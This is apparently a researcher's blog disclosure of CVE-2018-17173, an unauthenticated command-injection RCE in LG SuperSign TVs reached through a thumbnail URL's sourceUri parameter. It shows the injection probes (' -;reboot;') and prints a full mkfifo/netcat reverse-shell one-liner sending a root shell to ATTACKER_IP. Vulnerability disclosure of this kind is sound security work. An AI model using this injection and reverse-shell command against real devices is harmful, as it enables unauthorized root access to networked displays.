Publishing the previous vulnerabilities in LG SuperSign TVs left me a bad taste in my mouth. Something like "I know that there must be something more". So, I continued with my research and finally found the precious RCE.
This vulnerability has been addressed with the following CVE-2018-17173
Playing with the app through burp I saw a url with some parameters. These URL is requested when the application needs to load the thumbnails of the images the user has uploaded.
The application responded with the help screen of some utility called luna-send when the parameter sourceUri received the values "' or 1 --'". It looked like it was triggering a command that was calling this utility but failling due to an unexpected parameter. Cleaning a little bit the input I found that with the value ' -' it was enough to receive this response. I knew I was close.
If you see something like that in the response you immediately start to play with things like ;command, ;command;, etc, etc. After some failed attemps I tried with ' -;reboot;' and I saw how the TV was rebooting...the RCE was knocking on my door.
Getting a Shell
Taking advantage of the LFI, I knew that the TV had a netcat but was the netcat version that doesn't support the -e option (downloading the binary), so I used the alternative:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f
Encoded all to be passed in the URL
So, the payload was ready:
Putting it all together:
I launched netcat to catch the shell, made the request and...
I was in.
In a few days I'll be updating this post with more technical details.
That is all for now.
Points to take into account:
-No need to be authenticated
-No need to privilege escalation (app is running as root)